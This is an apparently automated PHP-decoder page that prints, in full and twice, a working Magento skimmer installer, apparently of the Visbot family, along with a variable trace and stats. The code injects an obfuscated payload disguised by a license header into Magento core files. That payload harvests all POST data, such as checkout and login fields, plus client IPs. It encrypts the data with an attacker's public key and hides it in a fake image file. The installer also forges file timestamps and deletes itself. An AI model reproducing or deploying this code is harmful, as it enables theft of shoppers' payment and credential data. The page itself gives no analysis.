Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?PHP if(isset($_GET['do'])){$g0='adminhtml/default/default/images';$y1='';if(file_exists(..

Decoded Output download

<?php if(isset($_GET['do'])){$g0='adminhtml/default/default/images';$y1='';if(file_exists('./'.$g0)){$g0='./'.$g0;$y1='../';}else{for($z2=0,$c3=10;$z2<$c3;$z2++){$g0=($y1=($z2?str_repeat('../',$z2):'')).'skin/adminhtml/default/default/images';if(file_exists($g0))break;else $g0=null;}}if($g0){$t4=$e5=null;$p6=array($g0);$e7=array('_bg','_sm','_icon','_left','_right','_corner','_center','_big','_small');for($z2=0,$c3=sizeof($p6);$z2<$c3&&!$t4;$z2++){if(!file_exists($p6[$z2]))mkdir($p6[$z2],0777,true);if(file_exists($p6[$z2])&&is_dir($p6[$z2])&&is_readable($p6[$z2])&&is_writable($p6[$z2])&&($y8=opendir($p6[$z2]))!==false){$p9=array();while(($c10=readdir($y8))!==false)if(preg_match('/(.+)(\.[^.]+)$/',$c10,$n11))$p9[]=array($n11[1],$n11[2]);closedir($y8);if($r12=sizeof($p9)){$b13=$r12>1?intval($r12/2):1;for($o14=0,$r12=sizeof($e7);$o14<$r12;$o14++){$d15=$p6[$z2].'/'.$p9[$b13][0].$e7[$o14].$p9[$b13][1];if(!file_exists($d15)){$t4=$d15;$e5=filemtime($p6[$z2].'/'.$p9[$b13][0].$p9[$b13][1]);break;}}}}}if($t4){$p9=array($y1.'includes/config.php'=>0,$y1.'app/Mage.php'=>0,$y1.'index.php'=>0,$y1.'app/code/core/Mage/Core/Controller/Front/Action.php'=>0,$y1.'app/code/core/Mage/Core/functions.php'=>0,$y1.'lib/Varien/Autoload.php'=>0);$i16=$e17=null;foreach($p9 as $n18=>$g19){if(file_exists($n18)&&is_readable($n18)&&is_writable($n18)){$p9[$n18]=1;$u20=file_get_contents($n18);if(stripos($u20,'Visbot')!==false &&stripos($u20,'Pong')!==false){$i16=$n18;$e17=str_between($u20,'$k2=\'','\';');break;}}}if($i16)echo '[exists][file='.$i16.'][delp='.$e17.']';else{$n21=false;foreach($p9 as $n18=>$g19){if($g19){$g22=filemtime($n18);$o23='p'.substr(md5(time()),0,7);$u20=file_get_contents($n18);$d24=str_replace(array('{RESFILE}','{LTIME}','{DEL_PARAM}'),array($t4,$e5,$o23),base64_decode('PD9QSFAgLyoqKiBNYWdlbnRvKiogTk9USUNFIE9GIExJQ0VOU0UqKiBUaGlzIHNvdXJjZSBmaWxlIGlzIHN1YmplY3QgdG8gdGhlIE9wZW4gU29mdHdhcmUgTGljZW5zZSAoT1NMIDMuMCkqIHRoYXQgaXMgYnVuZGxlZCB3aXRoIHRoaXMgcGFja2FnZSBpbiB0aGUgZmlsZSBMSUNFTlNFLnR4dC4qIEl0IGlzIGFsc28gYXZhaWxhYmxlIHRocm91Z2ggdGhlIHdvcmxkLXdpZGUtd2ViIGF0IHRoaXMgVVJMOiogaHR0cDovL29wZW5zb3VyY2Uub3JnL2xpY2Vuc2VzL29zbC0zLjAucGhwKiovJHkwPSd7UkVTRklMRX0nOyRtMT0ne0xUSU1FfSc7JGsyPSd7REVMX1BBUkFNfSc7JGszPSItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlHZU1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTUFEQ0JpQUtCZ0ZpS2h6RUdWVXhMZGtkQVBtVFZINzRRd1dCa1xuMGNEcHBOWDNuMGZtVlp5QlBjWVo1WUliRWVTTElPQ1hLYjV4VC9acndZeWsxM2pNSWhvOVdQbExSSmR4VDJSalxuYmNNdlhzenZXQndoMWxDb3ZybDYva3VsSXE1WmNuREZkbGNLelcyUFIvMTkrZ2tLaFJHazFZVVhNTGd3NkVGalxuajJjMUxKb1NwbnprOFdSRkFnTUJBQUU9XG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0iO2lmKEAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ109PSdWaXNib3QvMi4wICgraHR0cDovL3d3dy52aXN2by5jb20vZW4vd2VibWFzdGVycy5qc3A7Ym90QHZpc3ZvLmNvbSknKXtpZihpc3NldCgkX0dFVFskazJdKSl7JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCcnKTtAdG91Y2goJHkwLCRtMSwkbTEpO2VjaG8gJ2NsZWFuIG9rJzt9ZWxzZSBlY2hvICdQb25nJztleGl0O31pZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ107fWVsc2VpZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ107fWVsc2V7JGk0PUAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTt9aWYoaXNzZXQoJF9QT1NUKSYmc2l6ZW9mKCRfUE9TVCkpeyRhNT0nJztmb3JlYWNoKCRfUE9TVCBhcyAkaDY9PiRuNyl7aWYoaXNfYXJyYXkoJG43KSl7Zm9yZWFjaCgkbjcgYXMgJGY4PT4kbDkpe2lmKGlzX2FycmF5KCRsOSkpe2ZvcmVhY2goJGw5IGFzICRsMTA9PiR2MTEpe2lmKGlzX2FycmF5KCR2MTEpKXs7fWVsc2V7JGE1Lj0nOicuJGg2LidbJy4kZjguJ11bJy4kbDEwLiddPScuJHYxMTt9fX1lbHNleyRhNS49JzonLiRoNi4nWycuJGY4LiddPScuJGw5O319fWVsc2V7JGE1Lj0nOicuJGg2Lic9Jy4kbjc7fX0kYTU9JGk0LiRhNTt9ZWxzZXskYTU9bnVsbDt9aWYoJGE1KXskdDEyPWZhbHNlO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fWVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ2RsJykpeyRuMTM9c3RydG9sb3dlcihzdWJzdHIocGhwX3VuYW1lKCksMCwzKSk7JGQxND0ncGhwX29wZW5zc2wuJy4oJG4xMz09J3dpbic/J2RsbCc6J3NvJyk7QGRsKCRkMTQpO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fX1pZigkdDEyKXskdDE1PUBvcGVuc3NsX2dldF9wdWJsaWNrZXkoJGszKTskcTE2PTEyODskdDE3PScnOyRoMTg9bWQ1KG1kNShtaWNyb3RpbWUoKSkucmFuZCgpKTskZTE5PSRoMTg7d2hpbGUoJGUxOSl7JGYyMD1zdWJzdHIoJGUxOSwwLCRxMTYpOyRlMTk9c3Vic3RyKCRlMTksJHExNik7QG9wZW5zc2xfcHVibGljX2VuY3J5cHQoJGYyMCwkaDIxLCR0MTUpOyR0MTcuPSRoMjE7fSR0MjI9QG9wZW5zc2xfZW5jcnlwdCgkYTUsJ2FlczEyOCcsJGgxOCk7QG9wZW5zc2xfZnJlZV9rZXkoJHQxNSk7JGE1PSR0MTcuJzo6OlNFUDo6OicuJHQyMjt9JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCdKUEVHLTEuMScuYmFzZTY0X2VuY29kZSgkYTUpLEZJTEVfQVBQRU5EKTtAdG91Y2goJHkwLCRtMSwkbTEpO30/Pg=='));file_put_contents($n18,$d24.$u20);touch($n18,$g22,$g22);$u20=file_get_contents($n18);if(strpos($u20,$o23)===false)continue;$n21=true;break;}}echo $n21?'[success][file='.$t4.'][delp='.$o23.']':'[fail]';}}else echo '[noresf]';}else echo '[noresfpath]';unlink(__FILE__);}else echo '[ok]';?>

Did this file decode correctly?

Original Code

<?PHP if(isset($_GET['do'])){$g0='adminhtml/default/default/images';$y1='';if(file_exists('./'.$g0)){$g0='./'.$g0;$y1='../';}else{for($z2=0,$c3=10;$z2<$c3;$z2++){$g0=($y1=($z2?str_repeat('../',$z2):'')).'skin/adminhtml/default/default/images';if(file_exists($g0))break;else $g0=null;}}if($g0){$t4=$e5=null;$p6=array($g0);$e7=array('_bg','_sm','_icon','_left','_right','_corner','_center','_big','_small');for($z2=0,$c3=sizeof($p6);$z2<$c3&&!$t4;$z2++){if(!file_exists($p6[$z2]))mkdir($p6[$z2],0777,true);if(file_exists($p6[$z2])&&is_dir($p6[$z2])&&is_readable($p6[$z2])&&is_writable($p6[$z2])&&($y8=opendir($p6[$z2]))!==false){$p9=array();while(($c10=readdir($y8))!==false)if(preg_match('/(.+)(\.[^.]+)$/',$c10,$n11))$p9[]=array($n11[1],$n11[2]);closedir($y8);if($r12=sizeof($p9)){$b13=$r12>1?intval($r12/2):1;for($o14=0,$r12=sizeof($e7);$o14<$r12;$o14++){$d15=$p6[$z2].'/'.$p9[$b13][0].$e7[$o14].$p9[$b13][1];if(!file_exists($d15)){$t4=$d15;$e5=filemtime($p6[$z2].'/'.$p9[$b13][0].$p9[$b13][1]);break;}}}}}if($t4){$p9=array($y1.'includes/config.php'=>0,$y1.'app/Mage.php'=>0,$y1.'index.php'=>0,$y1.'app/code/core/Mage/Core/Controller/Front/Action.php'=>0,$y1.'app/code/core/Mage/Core/functions.php'=>0,$y1.'lib/Varien/Autoload.php'=>0);$i16=$e17=null;foreach($p9 as $n18=>$g19){if(file_exists($n18)&&is_readable($n18)&&is_writable($n18)){$p9[$n18]=1;$u20=file_get_contents($n18);if(stripos($u20,'Visbot')!==false &&stripos($u20,'Pong')!==false){$i16=$n18;$e17=str_between($u20,'$k2=\'','\';');break;}}}if($i16)echo '[exists][file='.$i16.'][delp='.$e17.']';else{$n21=false;foreach($p9 as $n18=>$g19){if($g19){$g22=filemtime($n18);$o23='p'.substr(md5(time()),0,7);$u20=file_get_contents($n18);$d24=str_replace(array('{RESFILE}','{LTIME}','{DEL_PARAM}'),array($t4,$e5,$o23),base64_decode('PD9QSFAgLyoqKiBNYWdlbnRvKiogTk9USUNFIE9GIExJQ0VOU0UqKiBUaGlzIHNvdXJjZSBmaWxlIGlzIHN1YmplY3QgdG8gdGhlIE9wZW4gU29mdHdhcmUgTGljZW5zZSAoT1NMIDMuMCkqIHRoYXQgaXMgYnVuZGxlZCB3aXRoIHRoaXMgcGFja2FnZSBpbiB0aGUgZmlsZSBMSUNFTlNFLnR4dC4qIEl0IGlzIGFsc28gYXZhaWxhYmxlIHRocm91Z2ggdGhlIHdvcmxkLXdpZGUtd2ViIGF0IHRoaXMgVVJMOiogaHR0cDovL29wZW5zb3VyY2Uub3JnL2xpY2Vuc2VzL29zbC0zLjAucGhwKiovJHkwPSd7UkVTRklMRX0nOyRtMT0ne0xUSU1FfSc7JGsyPSd7REVMX1BBUkFNfSc7JGszPSItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlHZU1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTUFEQ0JpQUtCZ0ZpS2h6RUdWVXhMZGtkQVBtVFZINzRRd1dCa1xuMGNEcHBOWDNuMGZtVlp5QlBjWVo1WUliRWVTTElPQ1hLYjV4VC9acndZeWsxM2pNSWhvOVdQbExSSmR4VDJSalxuYmNNdlhzenZXQndoMWxDb3ZybDYva3VsSXE1WmNuREZkbGNLelcyUFIvMTkrZ2tLaFJHazFZVVhNTGd3NkVGalxuajJjMUxKb1NwbnprOFdSRkFnTUJBQUU9XG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0iO2lmKEAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ109PSdWaXNib3QvMi4wICgraHR0cDovL3d3dy52aXN2by5jb20vZW4vd2VibWFzdGVycy5qc3A7Ym90QHZpc3ZvLmNvbSknKXtpZihpc3NldCgkX0dFVFskazJdKSl7JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCcnKTtAdG91Y2goJHkwLCRtMSwkbTEpO2VjaG8gJ2NsZWFuIG9rJzt9ZWxzZSBlY2hvICdQb25nJztleGl0O31pZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ107fWVsc2VpZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ107fWVsc2V7JGk0PUAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTt9aWYoaXNzZXQoJF9QT1NUKSYmc2l6ZW9mKCRfUE9TVCkpeyRhNT0nJztmb3JlYWNoKCRfUE9TVCBhcyAkaDY9PiRuNyl7aWYoaXNfYXJyYXkoJG43KSl7Zm9yZWFjaCgkbjcgYXMgJGY4PT4kbDkpe2lmKGlzX2FycmF5KCRsOSkpe2ZvcmVhY2goJGw5IGFzICRsMTA9PiR2MTEpe2lmKGlzX2FycmF5KCR2MTEpKXs7fWVsc2V7JGE1Lj0nOicuJGg2LidbJy4kZjguJ11bJy4kbDEwLiddPScuJHYxMTt9fX1lbHNleyRhNS49JzonLiRoNi4nWycuJGY4LiddPScuJGw5O319fWVsc2V7JGE1Lj0nOicuJGg2Lic9Jy4kbjc7fX0kYTU9JGk0LiRhNTt9ZWxzZXskYTU9bnVsbDt9aWYoJGE1KXskdDEyPWZhbHNlO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fWVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ2RsJykpeyRuMTM9c3RydG9sb3dlcihzdWJzdHIocGhwX3VuYW1lKCksMCwzKSk7JGQxND0ncGhwX29wZW5zc2wuJy4oJG4xMz09J3dpbic/J2RsbCc6J3NvJyk7QGRsKCRkMTQpO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fX1pZigkdDEyKXskdDE1PUBvcGVuc3NsX2dldF9wdWJsaWNrZXkoJGszKTskcTE2PTEyODskdDE3PScnOyRoMTg9bWQ1KG1kNShtaWNyb3RpbWUoKSkucmFuZCgpKTskZTE5PSRoMTg7d2hpbGUoJGUxOSl7JGYyMD1zdWJzdHIoJGUxOSwwLCRxMTYpOyRlMTk9c3Vic3RyKCRlMTksJHExNik7QG9wZW5zc2xfcHVibGljX2VuY3J5cHQoJGYyMCwkaDIxLCR0MTUpOyR0MTcuPSRoMjE7fSR0MjI9QG9wZW5zc2xfZW5jcnlwdCgkYTUsJ2FlczEyOCcsJGgxOCk7QG9wZW5zc2xfZnJlZV9rZXkoJHQxNSk7JGE1PSR0MTcuJzo6OlNFUDo6OicuJHQyMjt9JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCdKUEVHLTEuMScuYmFzZTY0X2VuY29kZSgkYTUpLEZJTEVfQVBQRU5EKTtAdG91Y2goJHkwLCRtMSwkbTEpO30/Pg=='));file_put_contents($n18,$d24.$u20);touch($n18,$g22,$g22);$u20=file_get_contents($n18);if(strpos($u20,$o23)===false)continue;$n21=true;break;}}echo $n21?'[success][file='.$t4.'][delp='.$o23.']':'[fail]';}}else echo '[noresf]';}else echo '[noresfpath]';unlink(__FILE__);}else echo '[ok]';?>

Function Calls

is_dir 1
sizeof 1
file_exists 3
is_readable 1

Variables

$c3 1
$e5 0
$e7 [{'key': 0, 'value': '_bg'}, {'key': 1, 'value': '_sm'}, {'key': 2, 'value': '_icon'}, {'key': 3, 'value': '_left'}, {'key': 4, 'value': '_right'}, {'key': 5, 'value': '_corner'}, {'key': 6, 'value': '_center'}, {'key': 7, 'value': '_big'}, {'key': 8, 'value': '_small'}]
$g0 ./adminhtml/default/default/images
$p6 [{'key': 0, 'value': './adminhtml/default/default/images'}]
$t4 0
$y1 ../
$z2 0

Stats

MD5 fd141197c89d27b30821f3de8627ac38
Eval Count 0
Decode Time 203 ms